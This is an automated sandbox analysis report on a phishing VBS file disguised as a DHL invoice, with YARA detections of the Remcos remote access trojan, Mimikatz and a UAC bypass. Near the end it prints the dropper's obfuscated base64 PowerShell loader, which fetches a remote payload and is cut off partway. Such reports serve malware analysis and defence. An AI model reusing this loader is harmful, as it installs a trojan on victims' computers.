                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_0044BBD821_2_0044BBD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_00404BE521_2_00404BE5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_00404C7621_2_00404C76
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_00415CFE21_2_00415CFE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_00416D7221_2_00416D72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_00446D3021_2_00446D30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_00446D8B21_2_00446D8B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_00406E8F21_2_00406E8F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0040503823_2_00405038
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041208C23_2_0041208C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_004050A923_2_004050A9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0040511A23_2_0040511A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0043C13A23_2_0043C13A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_004051AB23_2_004051AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0044930023_2_00449300
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0040D32223_2_0040D322
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0044A4F023_2_0044A4F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0043A5AB23_2_0043A5AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041363123_2_00413631
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0044669023_2_00446690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0044A73023_2_0044A730
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_004398D823_2_004398D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_004498E023_2_004498E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0044A88623_2_0044A886
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0043DA0923_2_0043DA09
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00438D5E23_2_00438D5E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00449ED023_2_00449ED0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041FE8323_2_0041FE83
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00430F5423_2_00430F54
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 24_2_004050C224_2_004050C2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 24_2_004014AB24_2_004014AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 24_2_0040513324_2_00405133
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 24_2_004051A424_2_004051A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 24_2_0040124624_2_00401246
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 24_2_0040CA4624_2_0040CA46
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 24_2_0040523524_2_00405235
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 24_2_004032C824_2_004032C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 24_2_0040168924_2_00401689
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 24_2_00402F6024_2_00402F60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 004169A7 appears 87 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 004165FF appears 35 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00434801 appears 41 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00422297 appears 42 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00434E70 appears 54 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00402093 appears 50 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 0044DB70 appears 41 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00401E65 appears 34 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00444B5A appears 37 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00413025 appears 79 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00416760 appears 69 times
                      Source: DHL_Shipping_Invoices_Awb_0000000.vbsInitial sample: Strings found which are bigger than 50
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 11533
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 11533Jump to behavior
                      Source: 27.2.powershell.exe.1c7286e7ed8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 27.2.powershell.exe.1c7286e7ed8.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 27.2.powershell.exe.1c7286e7ed8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 18.2.powershell.exe.286cfc17920.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 18.2.powershell.exe.286cfc17920.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 18.2.powershell.exe.286cfc17920.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 20.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 20.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 20.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 20.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 20.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 20.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 13.2.powershell.exe.1c41e7c6f90.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 13.2.powershell.exe.1c41e7c6f90.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 13.2.powershell.exe.1c41e7c6f90.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 27.2.powershell.exe.1c7286e7ed8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 27.2.powershell.exe.1c7286e7ed8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 13.2.powershell.exe.1c41e7c6f90.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 13.2.powershell.exe.1c41e7c6f90.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 18.2.powershell.exe.286cfc17920.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 18.2.powershell.exe.286cfc17920.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000012.00000002.2608765133.00000286CFA70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000000D.00000002.2474230885.000001C41E230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000001B.00000002.2715340821.000001C7283BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000000D.00000002.2474230885.000001C41E49E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: Process Memory Space: powershell.exe PID: 5236, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: powershell.exe PID: 1436, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: Process Memory Space: powershell.exe PID: 1436, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: powershell.exe PID: 7224, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 7224, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: classification engineClassification label: mal100.rans.spre.phis.troj.spyw.expl.evad.winVBS@43/34@9/6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,21_2_004182CE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,20_2_0041798D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 24_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,24_2_00410DE1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,21_2_00418758
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,20_2_0040F4AF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,20_2_0041B539
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,20_2_0041AADB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\x2.ps1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-DGYVFK
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7492:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5944:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oibokqmo.au1.ps1Jump to behavior
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSystem information queried: HandleInformation
                      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: AddInProcess32.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: AddInProcess32.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: AddInProcess32.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                      Source: AddInProcess32.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: AddInProcess32.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: AddInProcess32.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcAA6AC8ALw' + [char]66 + 'zAGIAZQ' + [char]66 + 'sAGUAZw' + [char]66 + 'pAC4AYw' + [char]66 + 'vAG0ALg' + [char]66 + 'iAHIALw' + [char]66 + '3AHAALQ' + [char]66 + 'jAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0AC8AcA' + [char]66 + 'sAHUAZw' + [char]66 + 'pAG4AcwAvAGMAbw' + [char]66 + 'nAG4AYQ' + [char]66 + 'jAC8Acw' + [char]66 + 'tAHMAaQ' + [char]66 + 'uAGMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAGcAag' + [char]66 + 'nAGYAegAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 